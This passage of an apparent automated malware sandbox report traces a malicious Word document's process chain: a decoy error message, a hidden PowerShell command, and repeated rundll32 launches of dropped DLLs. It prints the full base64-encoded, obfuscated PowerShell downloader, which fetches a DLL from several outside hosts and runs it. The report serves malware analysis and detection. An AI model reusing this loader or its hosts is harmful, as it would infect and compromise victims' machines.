bAGMAaABhAHIAXQA3ADkAKQAsACcAXAAnACkAKQArACQASQB5AHEAeAB2ADkAXwArACgAKAAnAC4AJwArACcAZABsACcAKQArACcAbAAnACkAOwAkAEEAMAA5AEwAPQAoACcAWAAnACsAKAAnADYAOAAnACsAJwBLACcAKQApADsAJABYADQAXwAxAHEAOABxAD0AKAAnAHcAXQAnACsAJwB4AG0AJwArACgAJwBbAHYAJwArACcAcwA6AC8ALwAnACsAJwBzAGgAdQBsACcAKQArACcAbwAnACsAKAAnAHYAJwArACcAYgBhAGEAJwArACcAegBhAHIALgBjAG8AbQAnACkAKwAnAC8AJwArACcAYwAnACsAKAAnAC8AJwArACcAYgBjAEwANgAvACcAKQArACgAJwBAACcAKwAnAHcAXQB4AG0AJwApACsAKAAnAFsAdgAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwBtACcAKwAnAHkAYgAnACkAKwAoACcAdQBzACcAKwAnAGkAJwApACsAKAAnAG4AZQBzAHMAJwArACcAZQAnACsAJwB2AGUAbgAnACkAKwAoACcAdAAnACsAJwAuAGMAbwBtACcAKQArACgAJwAvAHQAaQAnACsAJwBrAGkAJwApACsAKAAnAC0AJwArACcAaQBuACcAKQArACgAJwBzAHQAYQAnACsAJwBsACcAKwAnAGwAJwArACcALwBlAC8AQAAnACkAKwAoACcAdwBdAHgAbQAnACsAJwBbAHYAJwArACcAOgAnACkAKwAoACcALwAvAHUAJwArACcAaABrACcAKwAnAC4AYwBuACcAKQArACgAJwBjAHIAJwArACcAYQBuAGUAcwAnACkAKwAnAC4AYwAnACsAKAAnAG8AJwArACcAbQAvACcAKQArACgAJwBFACcAKwAnAHIAcgAnACkAKwAnAG8AJwArACgAJwByACcAKwAnAFAAYQBnAGUAcwAnACkAKwAnAC8AMwAnACsAJwAvACcAKwAnAEAAJwArACgAJwB3AF0AeABtACcAKwAnAFsAdgBzACcAKQArACcAOgAvACcAKwAnAC8AJwArACcAYwBhACcAKwAnAHAAJwArACgAJwB0AHUAcgAnACsAJwBlACcAKwAnAHQAaABlAGEAYwAnACkAKwAnAHQAaQAnACsAJwBvACcAKwAnAG4AJwArACcALgAnACsAKAAnAGMAbwBtAC4AJwArACcAYQB1ACcAKQArACgAJwAvACcAKwAnAHcAcAAtACcAKwAnAGkAbgBjACcAKQArACcAbAB1ACcAKwAnAGQAJwArACgAJwBlAHMAJwArACcALwBZACcAKQArACcAagBwACcAKwAoACcALwBAACcAKwAnAHcAXQAnACsAJwB4AG0AWwB2AHMAOgAnACsAJwAvAC8AdABoACcAKQArACcAZQBuACcAKwAoACcAZQAnACsAJwB0AHcAJwArACcAbwByAGsAJwArACcAZQByAC4AYwAnACkAKwAoACcAYQAnACsAJwAvAGMAJwApACsAJwBvAG0AJwArACcAbQBlACcAKwAnAG4AdAAnACsAJwAvACcAKwAnADgAJwArACcATgA0ACcAKwAnAC8AJwArACcAQAAnACsAJwB3ACcAKwAoACcAXQB4AG0AJwArACcAWwB2ACcAKQArACgAJwBzADoAJwArACcALwAnACkAKwAoACcALwAnACsAJwB0AHIAJwApACsAKAAnAGEAJwArACcAeQBvAG4AbABpAG4AJwApACsAJwBlACcAKwAnAGcAJwArACcAaAAuACcAKwAoACcAYwBvACcAKwAnAG0ALwAnACsAJwBjAGcAaQAtAGIAaQAnACkAKwAoACcAbgAnACsAJwAvAEgAQgBQACcAKwAnAFIALwBAACcAKQArACcAdwBdACcAKwAnAHgAbQAnACsAKAAnAFsAdgAnACsAJwA6AC8ALwBtAG0AbwAnACsAJwAuACcAKQArACgAJwBtACcAKwAnAGEAcgAnACkAKwAnAHQAaQAnACsAKAAnAG4AcABvAGwAbABvACcAKwAnAGMAJwArACcAawAuAGMAbwAuACcAKQArACgAJwB1AGsAJwArACcALwBhAC8AJwArACcAUwBRAFMAJwApACsAJwBHACcAKwAnAGcAJwArACcALwAnACkALgAiAHIAZQBgAFAAYABMAGEAYwBFACIAKAAoACgAJwB3ACcAKwAnAF0AeABtAFsAJwApACsAJwB2ACcAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAcwBkACcALAAnAHMAdwAnACkALAAoACgAJwBoACcAKwAnAHQAdAAnACkAKwAnAHAAJwApACwAJwAzAGQAJwApAFsAMQBdACkALgAiAFMAcABMAGAAaQBUACIAKAAkAEUANwA3AEsAIAArACAAJABOADMAMQA3ADYAYwByACAAKwAgACQAVQAxADEASAApADsAJABZADgAXwBZAD0AKAAoACcASwA5ACcAKwAnADAAJwApACsAJwBHACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQATAB5AHQAdwB6ADIAcwAgAGkAbgAgACQAWAA0AF8AMQBxADgAcQApAHsAdAByAHkAewAoAC4AKAAnAE4AZQAnACsAJwB3AC0ATwAnACsAJwBiAGoAZQBjAHQAJwApACAAUwBZAHMAVABFAG0ALgBuAEUAdAAuAFcAZQBCAEMAbABpAEUATgB0ACkALgAiAGQAbwBXAG4AYABMAGAAbwBBAGQAZgBJAGAATABFACIAKAAkAEwAeQB0AHcAegAyAHMALAAgACQATwBqAGkAaABuAHcAZwApADsAJABaADgAMwBRAD0AKAAnAFgAMAAnACsAJwAzAEcAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0AC0ASQB0AGUAbQAnACkAIAAkAE8AagBpAGgAbgB3AGcAKQAuACIATABgAGUATgBHAHQAaAAiACAALQBnAGUAIAAzADIAOAAxADcAKQAgAHsALgAoACcAcgAnACsAJwB1AG4AZAAnACsAJwBsAGwAMwAyACcAKQAgACQATwBqAGkAaABuAHcAZwAsACgAKAAnAFMAJwArACcAaABvACcAKQArACgAJwB3AEQAaQAnACsAJwBhACcAKwAnAGwAbwAnACkAKwAnAGcAQQAnACkALgAiAHQAYABvAHMAVABSAEkAYABOAGcAIgAoACkAOwAkAFkANgA5AEwAPQAoACcASwA4ACcAKwAnADQAVgAnACkAOwBiAHIAZQBhAGsAOwAkAFYAXwAyAFYAPQAoACcAWAAwACcAKwAnADcAUwAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFEANQAxAE8APQAoACgAJwBIACcAKwAnAF8AMwAnACkAKwAnAEcAJwApAA==
                                Imagebase:0x49d80000
                                File size:345088 bytes
                                MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate

                                Analysis Process: msg.exe PID: 2608 Parent PID: 2340

                                General

                                Start time:19:15:40
                                Start date:12/01/2021
                                Path:C:\Windows\System32\msg.exe
                                Wow64 process (32bit):false
                                Commandline:msg user /v Word experienced an error trying to open the file.
                                Imagebase:0xff1c0000
                                File size:26112 bytes
                                MD5 hash:2214979661E779C3E3C33D4F14E6F3AC
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate

                                Analysis Process: powershell.exe PID: 2692 Parent PID: 2340

                                General

                                Start time:19:15:41
                                Start date:12/01/2021
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:POwersheLL -w hidden -ENCOD JAAwAGUAMgB0AGsAPQBbAHQAeQBQAGUAXQAoACIAewAyAH0AewAxAH0AewAwAH0AewAzAH0AewA0AH0AIgAtAGYAJwBJACcALAAnAG0ALgAnACwAJwBTAHkAcwB0AEUAJwAsACcAbwAuAEQAaQAnACwAJwByAGUAQwBUAG8AcgB5ACcAKQA7ACAAcwBlAHQALQBpAHQARQBNACAAIAB2AEEAcgBpAGEAYgBMAEUAOgB3AGQAOAAgACAAKAAgAFsAVAB5AFAAZQBdACgAIgB7ADEAfQB7ADIAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAVgBJAGMARQBQAE8AaQBOAHQATQBhAG4AYQAnACwAJwBTAHkAUwB0ACcALAAnAGUATQAuAE4ARQB0AC4AcwBlAFIAJwAsACcAZwAnACwAJwBFAHIAJwApACkAIAA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwBpAGwAZQAnACsAJwBuACcAKQArACgAJwB0AGwAeQBDAG8AJwArACcAbgAnACkAKwAnAHQAJwArACgAJwBpAG4AJwArACcAdQBlACcAKQApADsAJABOADMAMQA3ADYAYwByAD0AJABRADIANQBVACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABWADkANgBSADsAJABDAF8AMQBRAD0AKAAnAE0AOQAnACsAJwA1AEkAJwApADsAIAAgACgAIAAgAFYAYQByAEkAQQBCAEwAZQAgACAAMABFADIAdABLACAAKQAuAHYAYQBMAFUARQA6ADoAIgBjAHIARQBBAFQAZQBEAGAASQBSAGUAQwBgAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEIASgBsAFcAZAAnACsAJwBkACcAKQArACgAJwB1AHkAMgAnACsAJwBtAEIAJwApACsAJwBKACcAKwAoACcAbABUAG0AYwAnACsAJwAxACcAKQArACgAJwBrACcAKwAnAHUAbwAnACkAKwAnAEIASgAnACsAJwBsACcAKQAuACIAUgBFAGAAcABgAEwAYQBjAEUAIgAoACgAJwBCACcAKwAnAEoAbAAnACkALAAnAFwAJwApACkAKQA7ACQATgA3ADMAUAA9ACgAJwBLACcAKwAoACcAMAAnACsAJwAzAFYAJwApACkAOwAgACQAVwBEADgAOgA6ACIAcwBgAEUAYABjAFUAUgBpAHQAWQBQAHIATwBUAG8AYwBgAG8AbAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVwBfADUASwA9ACgAKAAnAFQAJwArACcAOAA4ACcAKQArACcASgAnACkAOwAkAEkAeQBxAHgAdgA5AF8AIAA9ACAAKAAoACcASgA3ACcAKwAnADAAJwApACsAJwBIACcAKQA7ACQATAAxADIASwA9ACgAJwBZADAAJwArACcAMwBDACcAKQA7ACQATwBqAGkAaABuAHcAZwA9ACQASABPAE0ARQArACgAKAAoACcAUQBMAE8AVwBkAGQAJwArACcAdQAnACsAJwB5ADIAJwApACsAJwBtACcAKwAoACcAUQBMACcAKwAnAE8AJwApACsAJwBUAG0AJwArACgAJwBjACcAKwAnADEAawB1ACcAKQArACgAJwBvAFEATAAnACsAJwBPACcAKQApAC4AIgBSAGAAZQBQAGwAYQBgAGMAZQAiACgAKABbAGMAaABhAHIAXQA4ADEAKwBbAGMAaABhAHIAXQA3ADYAKwBbAGMAaABhAHIAXQA3ADkAKQAsACcAXAAnACkAKQArACQASQB5AHEAeAB2ADkAXwArACgAKAAnAC4AJwArACcAZABsACcAKQArACcAbAAnACkAOwAkAEEAMAA5AEwAPQAoACcAWAAnACsAKAAnADYAOAAnACsAJwBLACcAKQApADsAJABYADQAXwAxAHEAOABxAD0AKAAnAHcAXQAnACsAJwB4AG0AJwArACgAJwBbAHYAJwArACcAcwA6AC8ALwAnACsAJwBzAGgAdQBsACcAKQArACcAbwAnACsAKAAnAHYAJwArACcAYgBhAGEAJwArACcAegBhAHIALgBjAG8AbQAnACkAKwAnAC8AJwArACcAYwAnACsAKAAnAC8AJwArACcAYgBjAEwANgAvACcAKQArACgAJwBAACcAKwAnAHcAXQB4AG0AJwApACsAKAAnAFsAdgAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwBtACcAKwAnAHkAYgAnACkAKwAoACcAdQBzACcAKwAnAGkAJwApACsAKAAnAG4AZQBzAHMAJwArACcAZQAnACsAJwB2AGUAbgAnACkAKwAoACcAdAAnACsAJwAuAGMAbwBtACcAKQArACgAJwAvAHQAaQAnACsAJwBrAGkAJwApACsAKAAnAC0AJwArACcAaQBuACcAKQArACgAJwBzAHQAYQAnACsAJwBsACcAKwAnAGwAJwArACcALwBlAC8AQAAnACkAKwAoACcAdwBdAHgAbQAnACsAJwBbAHYAJwArACcAOgAnACkAKwAoACcALwAvAHUAJwArACcAaABrACcAKwAnAC4AYwBuACcAKQArACgAJwBjAHIAJwArACcAYQBuAGUAcwAnACkAKwAnAC4AYwAnACsAKAAnAG8AJwArACcAbQAvACcAKQArACgAJwBFACcAKwAnAHIAcgAnACkAKwAnAG8AJwArACgAJwByACcAKwAnAFAAYQBnAGUAcwAnACkAKwAnAC8AMwAnACsAJwAvACcAKwAnAEAAJwArACgAJwB3AF0AeABtACcAKwAnAFsAdgBzACcAKQArACcAOgAvACcAKwAnAC8AJwArACcAYwBhACcAKwAnAHAAJwArACgAJwB0AHUAcgAnACsAJwBlACcAKwAnAHQAaABlAGEAYwAnACkAKwAnAHQAaQAnACsAJwBvACcAKwAnAG4AJwArACcALgAnACsAKAAnAGMAbwBtAC4AJwArACcAYQB1ACcAKQArACgAJwAvACcAKwAnAHcAcAAtACcAKwAnAGkAbgBjACcAKQArACcAbAB1ACcAKwAnAGQAJwArACgAJwBlAHMAJwArACcALwBZACcAKQArACcAagBwACcAKwAoACcALwBAACcAKwAnAHcAXQAnACsAJwB4AG0AWwB2AHMAOgAnACsAJwAvAC8AdABoACcAKQArACcAZQBuACcAKwAoACcAZQAnACsAJwB0AHcAJwArACcAbwByAGsAJwArACcAZQByAC4AYwAnACkAKwAoACcAYQAnACsAJwAvAGMAJwApACsAJwBvAG0AJwArACcAbQBlACcAKwAnAG4AdAAnACsAJwAvACcAKwAnADgAJwArACcATgA0ACcAKwAnAC8AJwArACcAQAAnACsAJwB3ACcAKwAoACcAXQB4AG0AJwArACcAWwB2ACcAKQArACgAJwBzADoAJwArACcALwAnACkAKwAoACcALwAnACsAJwB0AHIAJwApACsAKAAnAGEAJwArACcAeQBvAG4AbABpAG4AJwApACsAJwBlACcAKwAnAGcAJwArACcAaAAuACcAKwAoACcAYwBvACcAKwAnAG0ALwAnACsAJwBjAGcAaQAtAGIAaQAnACkAKwAoACcAbgAnACsAJwAvAEgAQgBQACcAKwAnAFIALwBAACcAKQArACcAdwBdACcAKwAnAHgAbQAnACsAKAAnAFsAdgAnACsAJwA6AC8ALwBtAG0AbwAnACsAJwAuACcAKQArACgAJwBtACcAKwAnAGEAcgAnACkAKwAnAHQAaQAnACsAKAAnAG4AcABvAGwAbABvACcAKwAnAGMAJwArACcAawAuAGMAbwAuACcAKQArACgAJwB1AGsAJwArACcALwBhAC8AJwArACcAUwBRAFMAJwApACsAJwBHACcAKwAnAGcAJwArACcALwAnACkALgAiAHIAZQBgAFAAYABMAGEAYwBFACIAKAAoACgAJwB3ACcAKwAnAF0AeABtAFsAJwApACsAJwB2ACcAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAcwBkACcALAAnAHMAdwAnACkALAAoACgAJwBoACcAKwAnAHQAdAAnACkAKwAnAHAAJwApACwAJwAzAGQAJwApAFsAMQBdACkALgAiAFMAcABMAGAAaQBUACIAKAAkAEUANwA3AEsAIAArACAAJABOADMAMQA3ADYAYwByACAAKwAgACQAVQAxADEASAApADsAJABZADgAXwBZAD0AKAAoACcASwA5ACcAKwAnADAAJwApACsAJwBHACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQATAB5AHQAdwB6ADIAcwAgAGkAbgAgACQAWAA0AF8AMQBxADgAcQApAHsAdAByAHkAewAoAC4AKAAnAE4AZQAnACsAJwB3AC0ATwAnACsAJwBiAGoAZQBjAHQAJwApACAAUwBZAHMAVABFAG0ALgBuAEUAdAAuAFcAZQBCAEMAbABpAEUATgB0ACkALgAiAGQAbwBXAG4AYABMAGAAbwBBAGQAZgBJAGAATABFACIAKAAkAEwAeQB0AHcAegAyAHMALAAgACQATwBqAGkAaABuAHcAZwApADsAJABaADgAMwBRAD0AKAAnAFgAMAAnACsAJwAzAEcAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0AC0ASQB0AGUAbQAnACkAIAAkAE8AagBpAGgAbgB3AGcAKQAuACIATABgAGUATgBHAHQAaAAiACAALQBnAGUAIAAzADIAOAAxADcAKQAgAHsALgAoACcAcgAnACsAJwB1AG4AZAAnACsAJwBsAGwAMwAyACcAKQAgACQATwBqAGkAaABuAHcAZwAsACgAKAAnAFMAJwArACcAaABvACcAKQArACgAJwB3AEQAaQAnACsAJwBhACcAKwAnAGwAbwAnACkAKwAnAGcAQQAnACkALgAiAHQAYABvAHMAVABSAEkAYABOAGcAIgAoACkAOwAkAFkANgA5AEwAPQAoACcASwA4ACcAKwAnADQAVgAnACkAOwBiAHIAZQBhAGsAOwAkAFYAXwAyAFYAPQAoACcAWAAwACcAKwAnADcAUwAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFEANQAxAE8APQAoACgAJwBIACcAKwAnAF8AMwAnACkAKwAnAEcAJwApAA==
                                Imagebase:0x13f2e0000
                                File size:473600 bytes
                                MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.2107242892.0000000000216000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.2107409443.0000000001BA6000.00000004.00000001.sdmp, Author: Florian Roth
                                Reputation:high

                                Analysis Process: rundll32.exe PID: 960 Parent PID: 2692

                                General

                                Start time:19:15:50
                                Start date:12/01/2021
                                Path:C:\Windows\System32\rundll32.exe
                                Wow64 process (32bit):false
                                Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Wdduy2m\Tmc1kuo\J70H.dll ShowDialogA
                                Imagebase:0xffbb0000
                                File size:45568 bytes
                                MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate

                                Analysis Process: rundll32.exe PID: 2916 Parent PID: 960

                                General

                                Start time:19:15:50
                                Start date:12/01/2021
                                Path:C:\Windows\SysWOW64\rundll32.exe
                                Wow64 process (32bit):true
                                Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Wdduy2m\Tmc1kuo\J70H.dll ShowDialogA
                                Imagebase:0x6e0000
                                File size:44544 bytes
                                MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate

                                Analysis Process: rundll32.exe PID: 2956 Parent PID: 2916

                                General

                                Start time:19:15:51
                                Start date:12/01/2021
                                Path:C:\Windows\SysWOW64\rundll32.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qafsungwqhhv\abffsuupeze.glo',ShowDialogA
                                Imagebase:0x6e0000
                                File size:44544 bytes
                                MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate

                                Analysis Process: rundll32.exe PID: 2908 Parent PID: 2956

                                General

                                Start time:19:15:52
                                Start date:12/01/2021
                                Path:C:\Windows\SysWOW64\rundll32.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hqmvwbjvtszlkw\wwuzivduoqkxt.pxe',ShowDialogA
                                Imagebase:0x6e0000
                                File size:44544 bytes
                                MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate

                                Analysis Process: rundll32.exe PID: 2484 Parent PID: 2908

                                General

                                Start time:19:15:54
                                Start date:12/01/2021
                                Path:C:\Windows\SysWOW64\rundll32.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Aanys\cokk.vuq',ShowDialogA
                                Imagebase:0x6e0000
                                File size:44544 bytes
                                MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate

                                Disassembly

                                Code Analysis

                                Reset < >